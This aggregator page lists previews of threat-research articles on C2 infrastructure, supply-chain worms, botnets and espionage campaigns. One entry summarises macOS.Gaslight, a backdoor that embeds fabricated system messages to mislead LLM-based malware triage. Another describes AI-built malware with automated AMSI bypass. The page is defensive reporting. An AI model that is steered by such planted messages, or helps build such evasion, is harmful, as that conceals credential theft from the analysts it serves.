# C2

Published articles for C2.

This is one page of public article previews, not the complete archive. Follow Next page to continue. Summaries are not the original full articles.

## Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure

DevFeed: [Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](<https://devfeed.tech/articles/untracked-nightmares-the-threats-hiding-behind-commodity-infrastructure-7757.md>)

Original publisher: [Read original article](<https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/>)

Author: Rem Dudas

Published: 2026-09-09T10:00:55Z

Content type: article

Language: en

Sources: [Unit 42](<https://devfeed.tech/sources/unit-42.md>)

Topics: [ARKTunnel](<https://devfeed.tech/topics/arktunnel.md>), [backdoor](<https://devfeed.tech/topics/backdoor.md>)

Tags: [arktunnel](<https://devfeed.tech/tags/arktunnel.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [c2](<https://devfeed.tech/tags/c2.md>), [cl-cri-1171](<https://devfeed.tech/tags/cl-cri-1171.md>), [cybercrime](<https://devfeed.tech/tags/cybercrime.md>), [docro-hijacker](<https://devfeed.tech/tags/docro-hijacker.md>), [gaming](<https://devfeed.tech/tags/gaming.md>), [malware](<https://devfeed.tech/tags/malware.md>), [pay-per-install](<https://devfeed.tech/tags/pay-per-install.md>), [payload](<https://devfeed.tech/tags/payload.md>), [remote-access-trojan](<https://devfeed.tech/tags/remote-access-trojan.md>), [threat-research](<https://devfeed.tech/tags/threat-research.md>), [youtube](<https://devfeed.tech/tags/youtube.md>)

### AI overview

An investigation of the CL-CRI-1171 cybercrime campaign describes how YouTube gaming lures and SEO poisoning delivered malware through a custom loader. It covers Docro Hijacker, ARKTunnel, and the Insomnia remote access Trojan.

### Source excerpt

An investigation into how cybercriminals used YouTube gaming lures and SEO poisoning to deliver multi-payload malware to enterprise networks. The post Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure appeared first on Unit 42.

## Impersonating IT support: how threat actors turn a remote session into enterprise-wide access

DevFeed: [Impersonating IT support: how threat actors turn a remote session into enterprise-wide access](<https://devfeed.tech/articles/impersonating-it-support-how-threat-actors-turn-a-remote-session-into-enterprise-wide-access-7639.md>)

Original publisher: [Read original article](<https://www.microsoft.com/en-us/security/blog/2026/09/02/impersonating-it-support-threat-actors-turn-remote-session-into-enterprise-wide-access/>)

Author: Microsoft Security Research, Sagar Patil, Arlette Umuhire Sangwa, Jesse Birch and Ravikant Tiwari

Published: 2026-09-02T22:51:18Z

Content type: article

Language: en

Sources: [Microsoft Security Blog](<https://devfeed.tech/sources/microsoft-security-blog.md>)

Topics: [High Profile Threats](<https://devfeed.tech/topics/high-profile-threats.md>), [Node.js](<https://devfeed.tech/topics/node-js.md>)

Tags: [c2](<https://devfeed.tech/tags/c2.md>), [identity](<https://devfeed.tech/tags/identity.md>), [infrastructure](<https://devfeed.tech/tags/infrastructure.md>), [javascript](<https://devfeed.tech/tags/javascript.md>), [microsoft-teams](<https://devfeed.tech/tags/microsoft-teams.md>), [node-js](<https://devfeed.tech/tags/node-js.md>), [powershell](<https://devfeed.tech/tags/powershell.md>), [security](<https://devfeed.tech/tags/security.md>), [social-engineering](<https://devfeed.tech/tags/social-engineering.md>), [windows](<https://devfeed.tech/tags/windows.md>)

### AI overview

Microsoft analyzes an intrusion campaign in which attackers impersonate IT support through Microsoft Teams, obtain remote access, deploy a Node.js and JavaScript implant, and move laterally through enterprise systems. The article provides detection, mitigation, and hunting guidance.

### Source excerpt

Microsoft Threat Intelligence observed a human-operated intrusion campaign that abuses Microsoft Teams external collaboration to impersonate IT support, gain remote access, and deploy a Node.js-based implant. Learn how attackers move from social engineering to lateral movement using legitimate tools, and how Microsoft Defender helps detect and disrupt the activity. The post Impersonating IT support: how threat actors turn a remote session into enterprise-wide access appeared first on Microsoft Security Blog.

## TerminalFix campaign deploys a reverse tunnel through multistage intrusion

DevFeed: [TerminalFix campaign deploys a reverse tunnel through multistage intrusion](<https://devfeed.tech/articles/terminalfix-campaign-deploys-a-reverse-tunnel-through-multistage-intrusion-7636.md>)

Original publisher: [Read original article](<https://www.microsoft.com/en-us/security/blog/2026/08/28/terminalfix-campaign-deploys-reverse-tunnel-through-multistage-intrusion/>)

Author: Microsoft Security Research, Sagar Patil, Suriyaraj Natarajan and Parasharan Raghavan

Published: 2026-08-29T03:43:27Z

Content type: article

Language: en

Sources: [Microsoft Security Blog](<https://devfeed.tech/sources/microsoft-security-blog.md>)

Topics: [High Profile Threats](<https://devfeed.tech/topics/high-profile-threats.md>)

Tags: [analysis](<https://devfeed.tech/tags/analysis.md>), [c2](<https://devfeed.tech/tags/c2.md>), [clickfix](<https://devfeed.tech/tags/clickfix.md>), [cloudflare](<https://devfeed.tech/tags/cloudflare.md>), [microsoft](<https://devfeed.tech/tags/microsoft.md>), [persistence](<https://devfeed.tech/tags/persistence.md>), [powershell](<https://devfeed.tech/tags/powershell.md>), [python](<https://devfeed.tech/tags/python.md>), [ransomware](<https://devfeed.tech/tags/ransomware.md>), [security](<https://devfeed.tech/tags/security.md>), [windows](<https://devfeed.tech/tags/windows.md>)

### AI overview

Microsoft analyzes the TerminalFix ClickFix campaign, which uses a fake Cloudflare CAPTCHA to induce PowerShell execution and deploys a multi-stage intrusion chain. The chain includes DLL sideloading, steganographic payload delivery, Active Directory reconnaissance, persistence, and an encrypted reverse tunnel that can provide access into the compromised network.

### Source excerpt

Microsoft Threat Intelligence provides analysis of a ClickFix campaign that uses fake CAPTCHA prompts, DLL sideloading, and a reverse tunnel, with detections and hunting guidance. The post TerminalFix campaign deploys a reverse tunnel through multistage intrusion appeared first on Microsoft Security Blog.

## Connecting the Dots: Securing the Overlooked Corners of the Software Development Lifecycle (SDLC) Supply Chain

DevFeed: [Connecting the Dots: Securing the Overlooked Corners of the Software Development Lifecycle (SDLC) Supply Chain](<https://devfeed.tech/articles/connecting-the-dots-securing-the-overlooked-corners-of-the-software-development-lifecycle-sdlc-supply-chain-7758.md>)

Original publisher: [Read original article](<https://unit42.paloaltonetworks.com/sdlc-supply-chain/>)

Author: Yaron Avital

Published: 2026-08-21T23:00:21Z

Content type: article

Language: en

Sources: [Unit 42](<https://devfeed.tech/sources/unit-42.md>)

Topics: [sdlc](<https://devfeed.tech/topics/sdlc.md>), [Security](<https://devfeed.tech/topics/security.md>), [Application Security](<https://devfeed.tech/topics/application-security.md>), [CI/CD](<https://devfeed.tech/topics/cicd.md>), [GitHub Actions](<https://devfeed.tech/topics/github-actions.md>), [npm](<https://devfeed.tech/topics/npm.md>), [Bun](<https://devfeed.tech/topics/bun.md>), [Python](<https://devfeed.tech/topics/python.md>), [Claude Code](<https://devfeed.tech/topics/claude-code.md>), [vs-code](<https://devfeed.tech/topics/vs-code.md>), [Claude](<https://devfeed.tech/topics/claude.md>), [Ethereum](<https://devfeed.tech/topics/ethereum.md>)

Tags: [blockchain](<https://devfeed.tech/tags/blockchain.md>), [c2](<https://devfeed.tech/tags/c2.md>), [chaindrop](<https://devfeed.tech/tags/chaindrop.md>), [ci-cd](<https://devfeed.tech/tags/ci-cd.md>), [claude-code](<https://devfeed.tech/tags/claude-code.md>), [general](<https://devfeed.tech/tags/general.md>), [github-actions](<https://devfeed.tech/tags/github-actions.md>), [insights](<https://devfeed.tech/tags/insights.md>), [malware](<https://devfeed.tech/tags/malware.md>), [npm-packages](<https://devfeed.tech/tags/npm-packages.md>), [persistence](<https://devfeed.tech/tags/persistence.md>), [python](<https://devfeed.tech/tags/python.md>), [sdlc](<https://devfeed.tech/tags/sdlc.md>), [security](<https://devfeed.tech/tags/security.md>), [software-supply-chain-attack](<https://devfeed.tech/tags/software-supply-chain-attack.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [vs-code](<https://devfeed.tech/tags/vs-code.md>)

### AI overview

Unit 42 describes how software supply-chain attackers are targeting developer tools, CI/CD pipelines, accounts, packages, setup scripts and developer environments before software reaches production. It examines the ChainDrop npm worm, which used malicious preinstall hooks, a Bun runtime, an obfuscated payload, Python-based memory theft, stolen tokens and secrets, self-propagation, persistence in VS Code and Claude Code, and Ethereum-managed command-and-control infrastructure.

### Source excerpt

Attackers are targeting CI/CD pipelines and developer tools instead of application code, requiring total SDLC visibility and strict security controls The post Connecting the Dots: Securing the Overlooked Corners of the Software Development Lifecycle (SDLC) Supply Chain appeared first on Unit 42.

## N4D Mesh Controller: New infrastructure, a UPX-packed agent labeled "go-titan," and how to hunt for it

DevFeed: [N4D Mesh Controller: New infrastructure, a UPX-packed agent labeled "go-titan," and how to hunt for it](<https://devfeed.tech/articles/n4d-mesh-controller-new-infrastructure-a-upx-packed-agent-labeled-go-titan-and-how-to-hunt-for-it-8293.md>)

Original publisher: [Read original article](<https://securitylabs.datadoghq.com/articles/n4d-mesh-controller-go-titan-new-infrastructure-hunting/>)

Author: Zander Mackie

Published: 2026-08-20T00:00:00Z

Content type: article

Language: en

Sources: [Datadog Security Labs](<https://devfeed.tech/sources/datadog-security-labs.md>)

Topics: [Malware](<https://devfeed.tech/topics/malware.md>), [Model Context Protocol](<https://devfeed.tech/topics/model-context-protocol.md>), [MCP Server](<https://devfeed.tech/topics/mcp-server.md>), [Credential theft](<https://devfeed.tech/topics/credential-theft.md>), [Persistence](<https://devfeed.tech/topics/persistence.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Linux](<https://devfeed.tech/topics/linux.md>), [AI Infrastructure](<https://devfeed.tech/topics/ai-infrastructure.md>), [Go Language](<https://devfeed.tech/topics/go-language.md>)

Tags: [ai-infrastructure](<https://devfeed.tech/tags/ai-infrastructure.md>), [c2](<https://devfeed.tech/tags/c2.md>), [credential-theft](<https://devfeed.tech/tags/credential-theft.md>), [go](<https://devfeed.tech/tags/go.md>), [linux](<https://devfeed.tech/tags/linux.md>), [malware](<https://devfeed.tech/tags/malware.md>), [mcp](<https://devfeed.tech/tags/mcp.md>), [mcp-server](<https://devfeed.tech/tags/mcp-server.md>), [persistence](<https://devfeed.tech/tags/persistence.md>)

### AI overview

Datadog Security Research analyzes an active N4D Mesh Controller malware campaign targeting exposed MCP servers and other internet-facing services. The article documents a newer UPX-packed go-titan loader-to-agent chain, rotated infrastructure, Linux persistence mechanisms, automated MCP tool discovery and command execution, and broad scanning across databases, container platforms, application servers, and AI infrastructure.

### Source excerpt

Datadog Security Research executed a newer N4D Mesh Controller sample in isolated microVMs, uncovering rotated infrastructure, a UPX-packed go-titan agent, MCP tool abuse in action, and direct runtime evidence of multi-service scanning and persistence.

## Kimwolf v7: An Evolution of the Kimwolf Botnet

DevFeed: [Kimwolf v7: An Evolution of the Kimwolf Botnet](<https://devfeed.tech/articles/kimwolf-v7-an-evolution-of-the-kimwolf-botnet-7752.md>)

Original publisher: [Read original article](<https://unit42.paloaltonetworks.com/kimwolf-v7-botnet-malware/>)

Author: Asher Davila, Chris Navarrete and Doel Santos

Published: 2026-08-11T10:00:16Z

Content type: article

Language: en

Sources: [Unit 42](<https://devfeed.tech/sources/unit-42.md>)

Topics: [Kimwolf v7](<https://devfeed.tech/topics/kimwolf-v7.md>), [Android](<https://devfeed.tech/topics/android.md>), [DDoS](<https://devfeed.tech/topics/ddos.md>), [Internet of things](<https://devfeed.tech/topics/iot.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Ethereum Name Service (ENS)](<https://devfeed.tech/topics/ens.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [Cybercrime](<https://devfeed.tech/topics/cybercrime.md>), [Ethereum](<https://devfeed.tech/topics/ethereum.md>), [Blockchain](<https://devfeed.tech/topics/blockchain.md>), [Routing (disambiguation)](<https://devfeed.tech/topics/routing.md>), [Threat Hunting & Intel](<https://devfeed.tech/topics/threat-hunting-intel.md>)

Tags: [android](<https://devfeed.tech/tags/android.md>), [android-apk](<https://devfeed.tech/tags/android-apk.md>), [blockchain](<https://devfeed.tech/tags/blockchain.md>), [c2](<https://devfeed.tech/tags/c2.md>), [ddos](<https://devfeed.tech/tags/ddos.md>), [devices](<https://devfeed.tech/tags/devices.md>), [ethereum](<https://devfeed.tech/tags/ethereum.md>), [http](<https://devfeed.tech/tags/http.md>), [iot-botnets](<https://devfeed.tech/tags/iot-botnets.md>), [kimwolf-v7](<https://devfeed.tech/tags/kimwolf-v7.md>), [linux](<https://devfeed.tech/tags/linux.md>), [malware](<https://devfeed.tech/tags/malware.md>), [network](<https://devfeed.tech/tags/network.md>), [networks](<https://devfeed.tech/tags/networks.md>), [resilience](<https://devfeed.tech/tags/resilience.md>), [routing](<https://devfeed.tech/tags/routing.md>), [rpc](<https://devfeed.tech/tags/rpc.md>), [spoofing](<https://devfeed.tech/tags/spoofing.md>), [threat-research](<https://devfeed.tech/tags/threat-research.md>)

### AI overview

Kimwolf v7 is an Android and IoT botnet variant that adds HTTP/2-based DDoS flooding with browser fingerprinting, Ethereum Name Service resolution for C2 addresses, and Tor-backed routing to improve infrastructure resilience. The article also describes its targeting of Android TV devices and exploitation of unauthenticated ADB instances.

### Source excerpt

Discover how Kimwolf v7 targets Android IoT devices with HTTP/2 DDoS fingerprinting, Ethereum ENS C2 resolution and Tor backup routing. The post Kimwolf v7: An Evolution of the Kimwolf Botnet appeared first on Unit 42.

## The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications

DevFeed: [The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications](<https://devfeed.tech/articles/the-permanent-threat-analyzing-aeternum-s-blockchain-based-c2-operations-and-communications-7739.md>)

Original publisher: [Read original article](<https://unit42.paloaltonetworks.com/aeternum-blockchain-c2-analysis/>)

Author: Chris Navarrete, Sai Sathvik Ruppa and Haozhe Zhang

Published: 2026-08-10T22:00:02Z

Content type: article

Language: en

Sources: [Unit 42](<https://devfeed.tech/sources/unit-42.md>)

Topics: [Aeternum](<https://devfeed.tech/topics/aeternum.md>), [C++](<https://devfeed.tech/topics/c-plus-plus.md>), [Firewall](<https://devfeed.tech/topics/firewall.md>)

Tags: [aeternum](<https://devfeed.tech/tags/aeternum.md>), [analysis](<https://devfeed.tech/tags/analysis.md>), [blockchain](<https://devfeed.tech/tags/blockchain.md>), [c-plus-plus](<https://devfeed.tech/tags/c-plus-plus.md>), [c2](<https://devfeed.tech/tags/c2.md>), [infection-chain](<https://devfeed.tech/tags/infection-chain.md>), [json](<https://devfeed.tech/tags/json.md>), [malware](<https://devfeed.tech/tags/malware.md>), [python](<https://devfeed.tech/tags/python.md>), [rpc](<https://devfeed.tech/tags/rpc.md>), [telegram](<https://devfeed.tech/tags/telegram.md>), [threat-research](<https://devfeed.tech/tags/threat-research.md>), [xmrig](<https://devfeed.tech/tags/xmrig.md>), [xor](<https://devfeed.tech/tags/xor.md>)

### AI overview

An analysis of the Aeternum botnet loader, which uses Polygon blockchain smart contracts and public RPC endpoints for decentralized command-and-control. It also examines related Python malware using the Telegram API and a blended threat involving XWorm RAT, XMRig, and data exfiltration.

### Source excerpt

Analysis of the Aeternum botnet loader, a threat leveraging Polygon blockchain smart contracts for decentralized C2 infrastructure and payload execution. The post The Permanent Threat: Analyzing Aeternum's Blockchain-Based C2 Operations and Communications appeared first on Unit 42.

## ChainDrop: Inside a Self-Propagating npm Worm

DevFeed: [ChainDrop: Inside a Self-Propagating npm Worm](<https://devfeed.tech/articles/chaindrop-inside-a-self-propagating-npm-worm-7748.md>)

Original publisher: [Read original article](<https://unit42.paloaltonetworks.com/chaindrop-npm-worm-analysis/>)

Author: Unit 42

Published: 2026-08-06T22:26:39Z

Content type: article

Language: en

Sources: [Unit 42](<https://devfeed.tech/sources/unit-42.md>)

Topics: [ChainDrop](<https://devfeed.tech/topics/chaindrop.md>), [npm](<https://devfeed.tech/topics/npm.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Ethereum](<https://devfeed.tech/topics/ethereum.md>), [GitHub Actions](<https://devfeed.tech/topics/github-actions.md>), [GitHub](<https://devfeed.tech/topics/github.md>), [CI/CD](<https://devfeed.tech/topics/cicd.md>), [Security](<https://devfeed.tech/topics/security.md>)

Tags: [blockchain](<https://devfeed.tech/tags/blockchain.md>), [c2](<https://devfeed.tech/tags/c2.md>), [chaindrop](<https://devfeed.tech/tags/chaindrop.md>), [ci](<https://devfeed.tech/tags/ci.md>), [claude-code](<https://devfeed.tech/tags/claude-code.md>), [developer-tooling](<https://devfeed.tech/tags/developer-tooling.md>), [ethereum](<https://devfeed.tech/tags/ethereum.md>), [github](<https://devfeed.tech/tags/github.md>), [github-actions](<https://devfeed.tech/tags/github-actions.md>), [high-profile-threats](<https://devfeed.tech/tags/high-profile-threats.md>), [infrastructure](<https://devfeed.tech/tags/infrastructure.md>), [malware](<https://devfeed.tech/tags/malware.md>), [security](<https://devfeed.tech/tags/security.md>), [ssh](<https://devfeed.tech/tags/ssh.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [tokens](<https://devfeed.tech/tags/tokens.md>)

### AI overview

This article analyzes ChainDrop, a self-propagating npm worm that infected more than 400 packages and threatened developer workstations, CI pipelines, cloud environments and downstream users. It describes credential and token theft, GitHub Actions runner memory extraction, package republishing, persistence through developer and AI coding tools, blockchain-based C2 resolution, and C2 reconfiguration through an Ethereum transaction.

### Source excerpt

Analysis of ChainDrop, an npm supply chain worm extracting GitHub Actions runner secrets and using Ethereum smart contracts for C2 routing. The post ChainDrop: Inside a Self-Propagating npm Worm appeared first on Unit 42.

## Compromised AsyncAPI npm packages: inside a CI supply-chain attack

DevFeed: [Compromised AsyncAPI npm packages: inside a CI supply-chain attack](<https://devfeed.tech/articles/compromised-asyncapi-npm-packages-inside-a-ci-supply-chain-attack-8282.md>)

Original publisher: [Read original article](<https://securitylabs.datadoghq.com/articles/compromised-asyncapi-npm-packages/>)

Author: Christophe Tafani-Dereeper, Sebastian Obregoso, Eslam Salem

Published: 2026-07-14T00:00:00Z

Content type: article

Language: en

Sources: [Datadog Security Labs](<https://devfeed.tech/sources/datadog-security-labs.md>)

Topics: [npm](<https://devfeed.tech/topics/npm.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [ci](<https://devfeed.tech/topics/ci.md>), [GitHub](<https://devfeed.tech/topics/github.md>), [C2](<https://devfeed.tech/topics/c2.md>), [JavaScript](<https://devfeed.tech/topics/javascript.md>), [Cryptography](<https://devfeed.tech/topics/cryptography.md>), [IPFS](<https://devfeed.tech/topics/ipfs.md>), [P2P](<https://devfeed.tech/topics/p2p.md>), [cloud-infrastructure](<https://devfeed.tech/topics/cloud-infrastructure.md>), [Nostr](<https://devfeed.tech/topics/nostr.md>)

Tags: [c2](<https://devfeed.tech/tags/c2.md>), [ci](<https://devfeed.tech/tags/ci.md>), [cryptography](<https://devfeed.tech/tags/cryptography.md>), [github](<https://devfeed.tech/tags/github.md>), [go](<https://devfeed.tech/tags/go.md>), [infrastructure](<https://devfeed.tech/tags/infrastructure.md>), [javascript](<https://devfeed.tech/tags/javascript.md>), [malware](<https://devfeed.tech/tags/malware.md>), [network](<https://devfeed.tech/tags/network.md>), [npm-packages](<https://devfeed.tech/tags/npm-packages.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>)

### AI overview

This security article examines a CI supply-chain attack in which four compromised @asyncapi npm packages distributed credential-stealing malware. It traces the injected GitHub code, its IPFS-hosted second stage, encrypted configuration, credential harvesting, persistence mechanisms, and resilient command-and-control channels.

### Source excerpt

On July 14, 2026, four npm packages in the @asyncapi namespace, totaling over 3 million weekly downloads, were compromised to deliver credential-stealing malware. We investigate how the attack unfolded and how to know if you're affected.

## One Target, Two Flags | Rival Espionage Actors Converge On Pakistani Law Enforcement

DevFeed: [One Target, Two Flags | Rival Espionage Actors Converge On Pakistani Law Enforcement](<https://devfeed.tech/articles/one-target-two-flags-rival-espionage-actors-converge-on-pakistani-law-enforcement-8319.md>)

Original publisher: [Read original article](<https://www.sentinelone.com/labs/one-target-china-india-espionage-converge-on-pakistani-law-enforcement/>)

Author: Aleksandar Milenkoski & Julian-Ferdinand Vögele

Published: 2026-07-09T12:55:00Z

Content type: article

Language: en

Sources: [SentinelLabs - We are hunters, reversers, exploit developers, and tinkerers shedding light on the world of malware, exploits, APTs, and cybercrime across all platforms.](<https://devfeed.tech/sources/sentinellabs-we-are-hunters-reversers-exploit-developers-and-tinkerers-shedding-light-on-the-world-of-malware-exploits-apts-and-cybercrime-across-all-platforms.md>)

Topics: [Security](<https://devfeed.tech/topics/security.md>), [C2](<https://devfeed.tech/topics/c2.md>), [web applications](<https://devfeed.tech/topics/web-applications.md>), [data](<https://devfeed.tech/topics/data.md>), [Server](<https://devfeed.tech/topics/server.md>), [Network](<https://devfeed.tech/topics/network.md>)

Tags: [analysis](<https://devfeed.tech/tags/analysis.md>), [attacks](<https://devfeed.tech/tags/attacks.md>), [c2](<https://devfeed.tech/tags/c2.md>), [china](<https://devfeed.tech/tags/china.md>), [data](<https://devfeed.tech/tags/data.md>), [identity](<https://devfeed.tech/tags/identity.md>), [india](<https://devfeed.tech/tags/india.md>), [pakistan](<https://devfeed.tech/tags/pakistan.md>), [security](<https://devfeed.tech/tags/security.md>), [servers](<https://devfeed.tech/tags/servers.md>), [web-applications](<https://devfeed.tech/tags/web-applications.md>)

### AI overview

An analysis of cyberespionage intrusions targeting Pakistani law enforcement organizations from 2024 to 2026. Suspected China- and India-nexus actors converged on Balochistan Police, compromising servers, network appliances, and web applications containing police and citizen data, including biometric, criminal, identity-linked, and personnel records.

### Source excerpt

China and India ran separate espionage operations against the same Pakistani police force, each drawn by different stakes in Pakistan's internal security.

## SpectrePaste: An AI-Assisted, Fileless PowerShell Malware Delivery System

DevFeed: [SpectrePaste: An AI-Assisted, Fileless PowerShell Malware Delivery System](<https://devfeed.tech/articles/spectrepaste-22546.md>)

Original publisher: [Read original article](<https://medium.com/walmartglobaltech/spectrepaste-b20bc2f6ded8?source=rss----905ea2b3d4d1---4>)

Author: Joshua Platt

Published: 2026-07-06T18:54:30Z

Content type: article

Language: en

Sources: [Walmart Global Tech](<https://devfeed.tech/sources/walmart-global-tech.md>)

Topics: [Artificial Intelligence](<https://devfeed.tech/topics/ai.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [Threat Research](<https://devfeed.tech/topics/threat-research.md>), [PowerShell](<https://devfeed.tech/topics/powershell.md>), [C2](<https://devfeed.tech/topics/c2.md>), [Caching](<https://devfeed.tech/topics/caching.md>), [Encryption](<https://devfeed.tech/topics/encryption.md>), [Resilience](<https://devfeed.tech/topics/resilience.md>), [Routing (disambiguation)](<https://devfeed.tech/topics/routing.md>), [Polymorphism](<https://devfeed.tech/topics/polymorphism.md>), [Back end](<https://devfeed.tech/topics/backend.md>), [Spec Driven Development](<https://devfeed.tech/topics/spec-driven-development.md>)

Tags: [ai](<https://devfeed.tech/tags/ai.md>), [artificial-intelligence](<https://devfeed.tech/tags/artificial-intelligence.md>), [backend](<https://devfeed.tech/tags/backend.md>), [c2](<https://devfeed.tech/tags/c2.md>), [cache](<https://devfeed.tech/tags/cache.md>), [cybersecurity](<https://devfeed.tech/tags/cybersecurity.md>), [detection-engineering](<https://devfeed.tech/tags/detection-engineering.md>), [encryption](<https://devfeed.tech/tags/encryption.md>), [malware](<https://devfeed.tech/tags/malware.md>), [malware-analysis](<https://devfeed.tech/tags/malware-analysis.md>), [polymorphism](<https://devfeed.tech/tags/polymorphism.md>), [powershell](<https://devfeed.tech/tags/powershell.md>), [resilience](<https://devfeed.tech/tags/resilience.md>), [routing](<https://devfeed.tech/tags/routing.md>), [spec-driven-development](<https://devfeed.tech/tags/spec-driven-development.md>), [threat-intelligence](<https://devfeed.tech/tags/threat-intelligence.md>)

### AI overview

The article describes SpectrePaste, a previously undocumented fileless malware delivery system that threat actors used with AI as its primary orchestrator and developer. Its early architecture included automated AMSI-bypass generation, XOR-encrypted payloads, resilient command-and-control traffic handling, caching, request queuing, and administrative priority routing.

### Source excerpt

by Joshua Platt and Jason Reaves [TLP:CLEAR] Earlier this year, Google Threat Intelligence[1] reported threat actors are increasingly deploying novel, AI-enabled malware in active operations[2]. While investigating a recent OSINT article[3] on malware campaign activity reported as "DeepLoad", our threat intelligence team identified a separate, previously undocumented fileless delivery system we track as "SpectrePaste". The prior public reporting correctly suspected AI involvement in the "DeepLoad" delivery chain, but our analysis reveals a more conclusive and concerning reality. AI did not just play a supporting role. It acted as the primary orchestrator and developer behind the entire SpectrePaste system. Threat actors internally referred to the early system as "PasteFast Panel." In this initial iteration, the system was highly modular, structured, and designed specifically for resilience against high-volume bot traffic. One of the hallmarks of automated, AI-assisted development. The early architecture functioned as a centralized PowerShell payload delivery system with several notable features: Automated Evasion Generation: The paste builder module automatically prepended Anti-Malware Scan Interface (AMSI) bypass scripts to payloads upon creation, followed by XOR encryption using a custom obfuscator template. This ensured every payload served was dynamically packed. C2 Resilience & High-Load Handling: The most sophisticated feature of the early version was its custom cache manager queue system. The threat actors anticipated massive, simultaneous beaconing from compromised hosts. To prevent database exhaustion, the panel featured an automated threshold toggle. During traffic spikes, the system queued requests, cached the encrypted payloads in memory, and deduplicated IP addresses to ensure a single infected bot could not inadvertently DDoS the command server. Admin Priority Routing: Developer requirements explicitly prioritized operator access. Administrative routes

## macOS.Gaslight | Rust Backdoor Turns Prompt Injection on the Analyst, Not the Sandbox

DevFeed: [macOS.Gaslight | Rust Backdoor Turns Prompt Injection on the Analyst, Not the Sandbox](<https://devfeed.tech/articles/macos-gaslight-rust-backdoor-turns-prompt-injection-on-the-analyst-not-the-sandbox-8318.md>)

Original publisher: [Read original article](<https://www.sentinelone.com/labs/macos-gaslight-rust-backdoor-turns-prompt-injection-on-the-analyst-not-the-sandbox/>)

Author: Phil Stokes

Published: 2026-06-23T21:59:42Z

Content type: article

Language: en

Sources: [SentinelLabs - We are hunters, reversers, exploit developers, and tinkerers shedding light on the world of malware, exploits, APTs, and cybercrime across all platforms.](<https://devfeed.tech/sources/sentinellabs-we-are-hunters-reversers-exploit-developers-and-tinkerers-shedding-light-on-the-world-of-malware-exploits-apts-and-cybercrime-across-all-platforms.md>)

Topics: [AI Bots](<https://devfeed.tech/topics/ai-bots.md>), [AI Chat](<https://devfeed.tech/topics/ai-chat.md>)

Tags: [agent](<https://devfeed.tech/tags/agent.md>), [analysis](<https://devfeed.tech/tags/analysis.md>), [api](<https://devfeed.tech/tags/api.md>), [apple](<https://devfeed.tech/tags/apple.md>), [attacks](<https://devfeed.tech/tags/attacks.md>), [backdoor](<https://devfeed.tech/tags/backdoor.md>), [c2](<https://devfeed.tech/tags/c2.md>), [data](<https://devfeed.tech/tags/data.md>), [llm](<https://devfeed.tech/tags/llm.md>), [logs](<https://devfeed.tech/tags/logs.md>), [macos](<https://devfeed.tech/tags/macos.md>), [malware](<https://devfeed.tech/tags/malware.md>), [payload](<https://devfeed.tech/tags/payload.md>), [rust](<https://devfeed.tech/tags/rust.md>), [sandbox](<https://devfeed.tech/tags/sandbox.md>), [spoof](<https://devfeed.tech/tags/spoof.md>), [telegram](<https://devfeed.tech/tags/telegram.md>), [tls](<https://devfeed.tech/tags/tls.md>), [update](<https://devfeed.tech/tags/update.md>), [virustotal](<https://devfeed.tech/tags/virustotal.md>)

### AI overview

SentinelLABS analyzes macOS.Gaslight, a Rust implant whose embedded prompt injection attempts to derail LLM-assisted malware triage. The report describes Telegram Bot API command and control, encrypted communications, token redaction, and a suspected DPRK-linked activity cluster.

### Source excerpt

DPRK-linked implant embeds 38 fabricated system messages that spoof an LLM triage harness, hiding a credential stealer and Telegram C2 underneath.

## @mastra npm scope takeover: 143 packages backdoored via compromised contributor account

DevFeed: [@mastra npm scope takeover: 143 packages backdoored via compromised contributor account](<https://devfeed.tech/articles/mastra-npm-scope-takeover-143-packages-backdoored-via-compromised-contributor-account-13149.md>)

Original publisher: [Read original article](<https://www.chainguard.dev/unchained/mastra-npm-scope-takeover-143-packages-backdoored-via-compromised-contributor-account>)

Published: 2026-06-17T00:00:00Z

Content type: article

Language: en

Sources: [Chainguard: Unchained](<https://devfeed.tech/sources/chainguard-unchained.md>)

Topics: [npm](<https://devfeed.tech/topics/npm.md>), [Malware](<https://devfeed.tech/topics/malware.md>), [Remote Access Trojan](<https://devfeed.tech/topics/remote-access-trojan.md>), [Cryptocurrency](<https://devfeed.tech/topics/cryptocurrency.md>), [C2](<https://devfeed.tech/topics/c2.md>)

Tags: [c2](<https://devfeed.tech/tags/c2.md>), [chainguard-libraries](<https://devfeed.tech/tags/chainguard-libraries.md>), [chainguard-packages](<https://devfeed.tech/tags/chainguard-packages.md>), [command-and-control](<https://devfeed.tech/tags/command-and-control.md>), [crypto](<https://devfeed.tech/tags/crypto.md>), [malware](<https://devfeed.tech/tags/malware.md>), [mastra](<https://devfeed.tech/tags/mastra.md>), [npm](<https://devfeed.tech/tags/npm.md>), [npm-takeover](<https://devfeed.tech/tags/npm-takeover.md>), [packages](<https://devfeed.tech/tags/packages.md>), [provenance](<https://devfeed.tech/tags/provenance.md>), [remote-access](<https://devfeed.tech/tags/remote-access.md>), [remote-access-trojan](<https://devfeed.tech/tags/remote-access-trojan.md>), [secure-packages](<https://devfeed.tech/tags/secure-packages.md>), [software-packages](<https://devfeed.tech/tags/software-packages.md>), [supply-chain](<https://devfeed.tech/tags/supply-chain.md>), [tls](<https://devfeed.tech/tags/tls.md>)

### AI overview

The article reports that an attacker used a compromised former contributor account to republish all 143 packages in the @mastra npm scope on June 17, 2026. The malicious versions could disable TLS verification, download a cryptocurrency wallet stealer and remote access trojan, and establish command-and-control access. It recommends auditing dependency trees and lockfiles and rotating credentials on affected hosts.

### Source excerpt

A supply chain attack compromised all 143 @mastra packages. Chainguard customers stayed protected through malware blocking and source-built libraries.

## Mini Shai-Hulud Hits AntV: 300+ Malicious npm Packages Published via Compromised Maintainer Account

